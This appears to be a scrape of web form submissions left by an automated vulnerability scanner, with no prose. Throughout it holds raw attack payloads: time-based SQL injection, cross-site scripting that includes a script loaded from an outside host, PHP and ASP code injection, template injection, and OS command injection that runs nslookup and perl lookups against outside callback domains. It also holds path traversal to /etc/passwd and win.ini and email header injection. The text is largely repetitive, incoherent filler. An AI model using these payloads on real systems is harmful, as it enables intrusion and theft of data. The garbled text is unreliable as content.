RdkesOdP . ".gethostbyname(lc("hitmb"."mmwphqgnbdab8.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(78).chr(106).chr(76)."

'.gethostbyname(lc('hitaq'.'swsefssi5815b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(71).chr(119).chr(82).'

RdkesOdP . 1

".gethostbyname(lc("hitlx"."xgiiszgkffe5e.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(87).chr(117).chr(80)."

RdkesOdP . 1

20

RdkesOdP . 1<WPKBD9>FIQVI[!+!]</WPKBD9>

20

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); . 1

20

RdkesOdP . 1<script>6pI9(9885)</script>

20

';print(md5(31337));$a=' . 1

20

";print(md5(31337));$a=" . 1

20

${@print(md5(31337))} . 1

20

${@print(md5(31337))}\ . 1

20

RdkesOdP . 1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%36%70%49%39%28%39%34%32%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

20

'.print(md5(31337)).' . 1

20

RdkesOdP . ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

20

RdkesOdP . 1<ScRiPt >6pI9(9581)</ScRiPt>

20

RdkesOdP . ';print(md5(31337));$a='

20

RdkesOdP . ";print(md5(31337));$a="

20

RdkesOdP . 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9807></ScRiPt>

20

RdkesOdP . ${@print(md5(31337))}

20

RdkesOdP . ${@print(md5(31337))}\

20

RdkesOdP . 1<ScRiPt >6pI9(9566)</ScRiPt>

20

RdkesOdP . '.print(md5(31337)).'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

RdkesOdP . 1

';print(md5(31337));$a='

RdkesOdP . 1

";print(md5(31337));$a="

RdkesOdP . 1

${@print(md5(31337))}

RdkesOdP . 1

${@print(md5(31337))}\

RdkesOdP . 1

20'"()&%<acx><ScRiPt >6pI9(9938)</ScRiPt>

RdkesOdP . 1

'.print(md5(31337)).'

RdkesOdP . 1

'"()&%<acx><ScRiPt >6pI9(9344)</ScRiPt>

RdkesOdP . 1

209713511

RdkesOdP . 1

acu3616%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3616

RdkesOdP . 1

acux2803%C0%BEz1%C0%BCz2a%90bcxuca2803

RdkesOdP . 1

<%={{={@{#{${acx}}%>

RdkesOdP . 1

20

RdkesOdP . 1

<th:t="${acx}#foreach

RdkesOdP . 1

20

RdkesOdP . 1

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

RdkesOdP . 1

20

RdkesOdP . 1

acx{{98991*97996}}xca

RdkesOdP . 1

acx[[${98991*97996}]]xca

RdkesOdP . 1

acx__${98991*97996}__::.x

RdkesOdP . 1

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

RdkesOdP . 1

20<ScRiPt >6pI9(9786)</ScRiPt>

RdkesOdP . 1

20<WAU4T8>VWHED[!+!]</WAU4T8>

RdkesOdP . 1

20<script>6pI9(9876)</script>

RdkesOdP . 1

20%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%36%70%49%39%28%39%31%37%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

RdkesOdP . 1

20

RdkesOdP . 1

20<ScRiPt >6pI9(9500)</ScRiPt>

RdkesOdP . 1

20<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9776></ScRiPt>

RdkesOdP . 1

20<ScRiPt >6pI9(9479)</ScRiPt>

RdkesOdP . 1

20}body{acu:Expre/**/SSion(6pI9(9682))}

RdkesOdP . 1

ezT8f9hm'; waitfor delay '0:0:15' --

RdkesOdP . 1

-5 OR 658=(SELECT 658 FROM PG_SLEEP(15))--

RdkesOdP . 1

-5) OR 189=(SELECT 189 FROM PG_SLEEP(15))--

RdkesOdP . 1

-1)) OR 740=(SELECT 740 FROM PG_SLEEP(15))--

RdkesOdP . 1

Qhmcqyq7' OR 167=(SELECT 167 FROM PG_SLEEP(15))--

RdkesOdP . 1

LLg5d8sv') OR 825=(SELECT 825 FROM PG_SLEEP(15))--

RdkesOdP . 1

XwKSywNx')) OR 185=(SELECT 185 FROM PG_SLEEP(15))--

RdkesOdP . 1

20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

RdkesOdP . 1

20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

RdkesOdP . 1

1'"

RdkesOdP . 1

@@hNd5A

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

555

RdkesOdP . 1

555

RdkesOdP . 1

555

RdkesOdP . 1

20

response.write(9138080*9014167) . 1

20

'+response.write(9138080*9014167)+' . 1

20

"+response.write(9138080*9014167)+" . 1

20

RdkesOdP . 1

20

RdkesOdP . response.write(9777810*9314466)

20

RdkesOdP . '+response.write(9777810*9314466)+'

20

RdkesOdP . "+response.write(9777810*9314466)+"

response.write(9475270*9936295)

RdkesOdP . 1

'+response.write(9475270*9936295)+'

RdkesOdP . 1

"+response.write(9475270*9936295)+"

RdkesOdP . 1

20

RdkesOdP . 1

20

echo ujodjo$()\ hylfog\nz^xyu||a #' &echo ujodjo$()\ hylfog\nz^xyu||a #|" &echo ujodjo$()\ hylfog\nz^xyu||a # . 1

20

&echo ffnypf$()\ xbdnkr\nz^xyu||a #' &echo ffnypf$()\ xbdnkr\nz^xyu||a #|" &echo ffnypf$()\ xbdnkr\nz^xyu||a # . 1

20

|echo qtadhn$()\ xjjual\nz^xyu||a #' |echo qtadhn$()\ xjjual\nz^xyu||a #|" |echo qtadhn$()\ xjjual\nz^xyu||a # . 1

20

(nslookup hititjdttgyvh36c26.bxss.me||perl -e "gethostbyname('hititjdttgyvh36c26.bxss.me')") . 1

20

$(nslookup hitbbuoklyfte7c59a.bxss.me||perl -e "gethostbyname('hitbbuoklyfte7c59a.bxss.me')") . 1

20

&(nslookup hitjlksndbopw269fc.bxss.me||perl -e "gethostbyname('hitjlksndbopw269fc.bxss.me')")&'\"`0&(nslookup hitjlksndbopw269fc.bxss.me||perl -e "gethostbyname('hitjlksndbopw269fc.bxss.me')")&`' . 1

20

|(nslookup hityqmnospumzbf86a.bxss.me||perl -e "gethostbyname('hityqmnospumzbf86a.bxss.me')") . 1

20

`(nslookup hitexvciwdahm23529.bxss.me||perl -e "gethostbyname('hitexvciwdahm23529.bxss.me')")` . 1

20

RdkesOdP . echo yysyzy$()\ xeyffq\nz^xyu||a #' &echo yysyzy$()\ xeyffq\nz^xyu||a #|" &echo yysyzy$()\ xeyffq\nz^xyu||a #

20

RdkesOdP . &echo rzdvhf$()\ vlqaax\nz^xyu||a #' &echo rzdvhf$()\ vlqaax\nz^xyu||a #|" &echo rzdvhf$()\ vlqaax\nz^xyu||a #

20

RdkesOdP . |echo yivooy$()\ tsvpvy\nz^xyu||a #' |echo yivooy$()\ tsvpvy\nz^xyu||a #|" |echo yivooy$()\ tsvpvy\nz^xyu||a #

20

RdkesOdP . (nslookup hitctticpgvvw9c39b.bxss.me||perl -e "gethostbyname('hitctticpgvvw9c39b.bxss.me')")

20

RdkesOdP . $(nslookup hitfnlqsdjqazd8a20.bxss.me||perl -e "gethostbyname('hitfnlqsdjqazd8a20.bxss.me')")

20

RdkesOdP . &(nslookup hitpmftxasbkj45fe5.bxss.me||perl -e "gethostbyname('hitpmftxasbkj45fe5.bxss.me')")&'\"`0&(nslookup hitpmftxasbkj45fe5.bxss.me||perl -e "gethostbyname('hitpmftxasbkj45fe5.bxss.me')")&`'

20

RdkesOdP . |(nslookup hitgrviwmllnec5ecd.bxss.me||perl -e "gethostbyname('hitgrviwmllnec5ecd.bxss.me')")

20

RdkesOdP . `(nslookup hiteeyzkgsiypdf3ff.bxss.me||perl -e "gethostbyname('hiteeyzkgsiypdf3ff.bxss.me')")`

echo ubpqqa$()\ ewjrzb\nz^xyu||a #' &echo ubpqqa$()\ ewjrzb\nz^xyu||a #|" &echo ubpqqa$()\ ewjrzb\nz^xyu||a #

RdkesOdP . 1

&echo ukjfza$()\ qobthj\nz^xyu||a #' &echo ukjfza$()\ qobthj\nz^xyu||a #|" &echo ukjfza$()\ qobthj\nz^xyu||a #

RdkesOdP . 1

|echo xxgzvu$()\ zxczbx\nz^xyu||a #' |echo xxgzvu$()\ zxczbx\nz^xyu||a #|" |echo xxgzvu$()\ zxczbx\nz^xyu||a #

RdkesOdP . 1

(nslookup hitvbewnhvsxa2d8af.bxss.me||perl -e "gethostbyname('hitvbewnhvsxa2d8af.bxss.me')")

RdkesOdP . 1

$(nslookup hitmcbdvsvsxrb8332.bxss.me||perl -e "gethostbyname('hitmcbdvsvsxrb8332.bxss.me')")

RdkesOdP . 1

&(nslookup hitrsvpnvwwqt49f2a.bxss.me||perl -e "gethostbyname('hitrsvpnvwwqt49f2a.bxss.me')")&'\"`0&(nslookup hitrsvpnvwwqt49f2a.bxss.me||perl -e "gethostbyname('hitrsvpnvwwqt49f2a.bxss.me')")&`'

RdkesOdP . 1

|(nslookup hitwmyauqmyaia6b6d.bxss.me||perl -e "gethostbyname('hitwmyauqmyaia6b6d.bxss.me')")

RdkesOdP . 1

`(nslookup hitpfcrkpyucr6fca9.bxss.me||perl -e "gethostbyname('hitpfcrkpyucr6fca9.bxss.me')")`

RdkesOdP . 1

;(nslookup hitijebblvquoc00f5.bxss.me||perl -e "gethostbyname('hitijebblvquoc00f5.bxss.me')")|(nslookup hitijebblvquoc00f5.bxss.me||perl -e "gethostbyname('hitijebblvquoc00f5.bxss.me')")&(nslookup hitijebblvquoc00f5.bxss.me||perl -e "gethostbyname('hitijebblvquoc00f5.bxss.me')")

RdkesOdP . 1

20

A2ewVOgR . 1

20

RdkesOdP . gJ4pPdqP

7f7YqkBu

RdkesOdP . 1

20

RdkesOdP . 1

20

../../../../../../../../../../../../../../etc/passwd . 1

20

../../../../../../../../../../../../../../windows/win.ini . 1

20

RdkesOdP . 1

20

../RdkesOdP . 1

20

RdkesOdP . ../../../../../../../../../../../../../../etc/passwd

20

RdkesOdP . ../../../../../../../../../../../../../../windows/win.ini

20

RdkesOdP . 1

20

RdkesOdP . ../1

../../../../../../../../../../../../../../etc/passwd

RdkesOdP . 1

../../../../../../../../../../../../../../windows/win.ini

RdkesOdP . 1

20

RdkesOdP . 1

../20

RdkesOdP . 1

20

'" . 1

20

<!-- . 1

20

RdkesOdP&n939309=v919855 . 1

20

RdkesOdP . '"

20

RdkesOdP'"()&%<acx><ScRiPt >5KnD(9435)</ScRiPt> . 1

20

RdkesOdP . <!--

20

RdkesOdP . 1&n931743=v975654

'"

RdkesOdP . 1

20

'"()&%<acx><ScRiPt >5KnD(9498)</ScRiPt> . 1

<!--

RdkesOdP . 1

20&n931719=v966283

RdkesOdP . 1

20

RdkesOdP%0abcc:009247.198-17270.198.bc6a2.19253.2@bxss.me . 1

20

RdkesOdP9643129 . 1

20

to@example.com>%0d%0abcc:009247.198-17271.198.bc6a2.19253.2@bxss.me . 1

20

RdkesOdP . 1%0abcc:009247.198-17272.198.bc6a2.19253.2@bxss.me

20

acu3436%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3436 . 1

20

/xfs.bxss.me . 1

20

RdkesOdP . to@example.com>%0d%0abcc:009247.198-17273.198.bc6a2.19253.2@bxss.me

20

RdkesOdP . /xfs.bxss.me

/xfs.bxss.me

RdkesOdP . 1

20

acux2962%C0%BEz1%C0%BCz2a%90bcxuca2962 . 1

20%0abcc:009247.198-17274.198.bc6a2.19253.2@bxss.me

RdkesOdP . 1

to@example.com>%0d%0abcc:009247.198-17275.198.bc6a2.19253.2@bxss.me

RdkesOdP . 1

20

<%={{={@{#{${acx}}%> . 1

20

RdkesOdP<esi:include src="http://bxss.me/rpb.png"/> . 1

20

${9999232+10000297} . 1

20

RdkesOdP . 1<esi:include src="http://bxss.me/rpb.png"/>

20

RdkesOdP . ${9999857+9999474}

20<esi:include src="http://bxss.me/rpb.png"/>

RdkesOdP . 1

20

RdkesOdP . 1

${9999172+9999745}

RdkesOdP . 1

20

UDJySndMMmg= . 1

20

<th:t="${acx}#foreach . 1

20

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg . 1

20

1some_inexistent_file_with_long_name%00.jpg . 1

20

RdkesOdP . 1

20

) . 1

20

HttP://bxss.me/t/xss.html?%00 . 1

20

!(()&&!|*|*| . 1

20

bxss.me/t/xss.html?%00 . 1

20

Http://bxss.me/t/fit.txt . 1

20

RdkesOdP . HttP://bxss.me/t/xss.html?%00

20

^(#$!@#$)(()))****** . 1

20

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> . 1

20

http://bxss.me/t/fit.txt%3F.jpg . 1

20

RdkesOdP . bxss.me/t/xss.html?%00

20

RdkesOdP . )

20

bxss.me . 1

HttP://bxss.me/t/xss.html?%00

RdkesOdP . 1

20

RdkesOdP . !(()&&!|*|*|

20

RdkesOdP . 1

20

RdkesOdP . http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

bxss.me/t/xss.html?%00

RdkesOdP . 1

20

RdkesOdP . 1some_inexistent_file_with_long_name%00.jpg

20

RdkesOdP . ^(#$!@#$)(()))******

20

acx{{98991*97996}}xca . 1

20

RdkesOdP . Http://bxss.me/t/fit.txt

)

RdkesOdP . 1

20

RdkesOdP . http://bxss.me/t/fit.txt%3F.jpg

!(()&&!|*|*|

RdkesOdP . 1

20

"+"A".concat(70-3).concat(22*4).concat(98).concat(77).concat(109).concat(66)+(require"socket" Socket.gethostbyname("hityw"+"xjarvgiw7b7bd.bxss.me.")[3].to_s)+" . 1

20

acx[[${98991*97996}]]xca . 1

20

RdkesOdP . bxss.me

^(#$!@#$)(()))******

RdkesOdP . 1

20

'+'A'.concat(70-3).concat(22*4).concat(110).concat(88).concat(109).concat(77)+(require'socket' Socket.gethostbyname('hiteb'+'orxgcyqy27bd8.bxss.me.')[3].to_s)+' . 1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

RdkesOdP . 1

20

RdkesOdP . "+"A".concat(70-3).concat(22*4).concat(102).concat(78).concat(112).concat(78)+(require"socket" Socket.gethostbyname("hitqf"+"eeknraysb9a46.bxss.me.")[3].to_s)+"

1some_inexistent_file_with_long_name%00.jpg

RdkesOdP . 1

20

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) . 1

20

acx__${98991*97996}__::.x . 1

20

RdkesOdP . '+'A'.concat(70-3).concat(22*4).concat(108).concat(73).concat(103).concat(75)+(require'socket' Socket.gethostbyname('hitgt'+'gaoknqgu2a896.bxss.me.')[3].to_s)+'

Http://bxss.me/t/fit.txt

RdkesOdP . 1

"+"A".concat(70-3).concat(22*4).concat(104).concat(71).concat(114).concat(89)+(require"socket" Socket.gethostbyname("hitzo"+"ntsbflip9a4d8.bxss.me.")[3].to_s)+"

RdkesOdP . 1

20

RdkesOdP . )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

20

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") . 1

'+'A'.concat(70-3).concat(22*4).concat(120).concat(76).concat(107).concat(82)+(require'socket' Socket.gethostbyname('hitui'+'smxcxrhbf2949.bxss.me.')[3].to_s)+'

RdkesOdP . 1

http://bxss.me/t/fit.txt%3F.jpg

RdkesOdP . 1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

RdkesOdP . 1

bxss.me

RdkesOdP . 1

20

RdkesOdP<ScRiPt >5KnD(9276)</ScRiPt> . 1

20

'.gethostbyname(lc('hitvt'.'nagvdlcw688eb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(65).chr(97).chr(82).' . 1

20

".gethostbyname(lc("hitge"."rhjhvwqdfcb95.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(83).chr(107).chr(72)." . 1

20

RdkesOdP . '.gethostbyname(lc('hitnr'.'znwxivjv347ff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(76).chr(102).chr(85).'

20

RdkesOdP<WQGJBV>UUCV1[!+!]</WQGJBV> . 1

20

RdkesOdP . ".gethostbyname(lc("hituf"."etxxeadcb4f3b.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(80).chr(111).chr(85)."

'.gethostbyname(lc('hitzf'.'alhmhbjue4939.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(69).chr(98).chr(77).'

RdkesOdP . 1

".gethostbyname(lc("hithn"."soqubfpqf0c6c.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(90).chr(113).chr(80)."

RdkesOdP . 1

20

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); . 1

20

RdkesOdP<script>5KnD(9069)</script> . 1

20

';print(md5(31337));$a=' . 1

20

";print(md5(31337));$a=" . 1

20

${@print(md5(31337))} . 1

20

RdkesOdP%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%35%4B%6E%44%28%39%34%37%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E . 1

20

${@print(md5(31337))}\ . 1

20

'.print(md5(31337)).' . 1

20

RdkesOdP<ScRiPt >5KnD(9566)</ScRiPt> . 1

20

RdkesOdP . ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

20

RdkesOdP . ';print(md5(31337));$a='

20

RdkesOdP<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9421></ScRiPt> . 1

20

RdkesOdP . ";print(md5(31337));$a="

20

RdkesOdP<ScRiPt >5KnD(9535)</ScRiPt> . 1

20

RdkesOdP . ${@print(md5(31337))}

20

RdkesOdP . ${@print(md5(31337))}\

20

RdkesOdP . '.print(md5(31337)).'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

RdkesOdP . 1

';print(md5(31337));$a='

RdkesOdP . 1

";print(md5(31337));$a="

RdkesOdP . 1

${@print(md5(31337))}

RdkesOdP . 1

20

RdkesOdP . 1'"()&%<acx><ScRiPt >5KnD(9783)</ScRiPt>

${@print(md5(31337))}\

RdkesOdP . 1

'.print(md5(31337)).'

RdkesOdP . 1

20

RdkesOdP . '"()&%<acx><ScRiPt >5KnD(9217)</ScRiPt>

20

RdkesOdP . 19134260

20

RdkesOdP . acu7514%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7514

20

RdkesOdP . acux2812%C0%BEz1%C0%BCz2a%90bcxuca2812

20

RdkesOdP . <%={{={@{#{${acx}}%>

20

RdkesOdP . 1

20

RdkesOdP . <th:t="${acx}#foreach

20

RdkesOdP . 1

20

RdkesOdP . 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

20

RdkesOdP . 1

20

RdkesOdP . acx{{98991*97996}}xca

20

RdkesOdP . acx[[${98991*97996}]]xca

20

RdkesOdP . acx__${98991*97996}__::.x

20

RdkesOdP . "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

20

RdkesOdP . 1<ScRiPt >5KnD(9169)</ScRiPt>

20

RdkesOdP . 1<W8IG2S>VBWLZ[!+!]</W8IG2S>

20

RdkesOdP . 1<script>5KnD(9894)</script>

20

RdkesOdP . 1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%35%4B%6E%44%28%39%31%33%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

20

RdkesOdP . 1<ScRiPt >5KnD(9327)</ScRiPt>

20

RdkesOdP . 1

20

RdkesOdP . 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9538></ScRiPt>

20

RdkesOdP . 1<ScRiPt >5KnD(9022)</ScRiPt>

20'"()&%<acx><ScRiPt >5KnD(9513)</ScRiPt>

RdkesOdP . 1

20

RdkesOdP . 1

'"()&%<acx><ScRiPt >5KnD(9118)</ScRiPt>

RdkesOdP . 1

209440145

RdkesOdP . 1

acu3331%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3331

RdkesOdP . 1

acux8907%C0%BEz1%C0%BCz2a%90bcxuca8907

RdkesOdP . 1

<%={{={@{#{${acx}}%>

RdkesOdP . 1

20

RdkesOdP . 1

20

Gedic6Ik . 1

20

-1 OR 2+175-175-1=0+0+0+1 -- . 1

20

-1 OR 2+120-120-1=0+0+0+1 . 1

<th:t="${acx}#foreach

RdkesOdP . 1

20

-1' OR 2+990-990-1=0+0+0+1 -- . 1

20

-1' OR 2+967-967-1=0+0+0+1 or 'IuKTTqGv'=' . 1

20

RdkesOdP . 1

20

-1" OR 2+189-189-1=0+0+0+1 -- . 1

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

RdkesOdP . 1

20

if(now()=sysdate(),sleep(15),0) . 1

20

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z . 1

20

RdkesOdP . 1

acx{{98991*97996}}xca

RdkesOdP . 1

acx[[${98991*97996}]]xca

RdkesOdP . 1

acx__${98991*97996}__::.x

RdkesOdP . 1

20

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z . 1

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

RdkesOdP . 1

20<ScRiPt >5KnD(9457)</ScRiPt>

RdkesOdP . 1

20<W8GKIB>ZGOBU[!+!]</W8GKIB>

RdkesOdP . 1

20<script>5KnD(9070)</script>

RdkesOdP . 1

20

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ . 1

20%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%35%4B%6E%44%28%39%37%34%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

RdkesOdP . 1

20<ScRiPt >5KnD(9660)</ScRiPt>

RdkesOdP . 1

20<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9833></ScRiPt>

RdkesOdP . 1

20

1 waitfor delay '0:0:15' -- . 1

20<ScRiPt >5KnD(9482)</ScRiPt>

RdkesOdP . 1

20

RD7CCLWa'; waitfor delay '0:0:15' -- . 1

20

kBsU3IUf' OR 633=(SELECT 633 FROM PG_SLEEP(15))-- . 1

20

UwQZbKX4') OR 849=(SELECT 849 FROM PG_SLEEP(15))-- . 1

20

f74Ant44')) OR 748=(SELECT 748 FROM PG_SLEEP(15))-- . 1

20

RdkesOdP'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' . 1

20

1'" . 1

20

@@pJYcP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1uO0Hb69

20

RdkesOdP . -1 OR 2+563-563-1=0+0+0+1 --

20

RdkesOdP . -1 OR 2+187-187-1=0+0+0+1

20

RdkesOdP . -1' OR 2+127-127-1=0+0+0+1 --

20

RdkesOdP . -1' OR 2+903-903-1=0+0+0+1 or 'VB1csSum'='

20

RdkesOdP . -1" OR 2+733-733-1=0+0+0+1 --

20

RdkesOdP . if(now()=sysdate(),sleep(15),0)

20

RdkesOdP . 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

20

RdkesOdP . 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

20

RdkesOdP . (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

20

RdkesOdP . -1; waitfor delay '0:0:15' --

20

RdkesOdP . -1); waitfor delay '0:0:15' --

20

RdkesOdP . 1 waitfor delay '0:0:15' --

20

RdkesOdP . Okv6Eaho'; waitfor delay '0:0:15' --

20

RdkesOdP . -5 OR 303=(SELECT 303 FROM PG_SLEEP(15))--

20

RdkesOdP . -5) OR 769=(SELECT 769 FROM PG_SLEEP(15))--

20

RdkesOdP . -1)) OR 789=(SELECT 789 FROM PG_SLEEP(15))--

20

RdkesOdP . fzr2ldJY' OR 543=(SELECT 543 FROM PG_SLEEP(15))--

20

RdkesOdP . oaWBkM4C') OR 739=(SELECT 739 FROM PG_SLEEP(15))--

20

RdkesOdP . S91gvrsh')) OR 539=(SELECT 539 FROM PG_SLEEP(15))--

20

RdkesOdP . 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

20

RdkesOdP . 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

20

RdkesOdP . 1'"

20

RdkesOdP . @@UWHTY

20

RdkesOdP . 1

20

RdkesOdP . 1

q97hYE9B

RdkesOdP . 1

-1 OR 2+994-994-1=0+0+0+1 --

RdkesOdP . 1

-1 OR 2+774-774-1=0+0+0+1

RdkesOdP . 1

-1' OR 2+16-16-1=0+0+0+1 --

RdkesOdP . 1

-1' OR 2+842-842-1=0+0+0+1 or '0G87kVZa'='

RdkesOdP . 1

-1" OR 2+674-674-1=0+0+0+1 --

RdkesOdP . 1

if(now()=sysdate(),sleep(15),0)

RdkesOdP . 1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

RdkesOdP . 1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

RdkesOdP . 1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

RdkesOdP . 1

-1; waitfor delay '0:0:15' --

RdkesOdP . 1

-1); waitfor delay '0:0:15' --

RdkesOdP . 1

1 waitfor delay '0:0:15' --

RdkesOdP . 1

z9X90n4Q'; waitfor delay '0:0:15' --

RdkesOdP . 1

-5 OR 903=(SELECT 903 FROM PG_SLEEP(15))--

RdkesOdP . 1

-5) OR 91=(SELECT 91 FROM PG_SLEEP(15))--

RdkesOdP . 1

-1)) OR 122=(SELECT 122 FROM PG_SLEEP(15))--

RdkesOdP . 1

6oXYXZYq' OR 911=(SELECT 911 FROM PG_SLEEP(15))--

RdkesOdP . 1

9c3MhfkQ') OR 230=(SELECT 230 FROM PG_SLEEP(15))--

RdkesOdP . 1

7QpGBSmw')) OR 802=(SELECT 802 FROM PG_SLEEP(15))--

RdkesOdP . 1

20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

RdkesOdP . 1

20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

RdkesOdP . 1

1'"

RdkesOdP . 1

@@0NtqY

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

20

RdkesOdP . 1

hi

hi . hi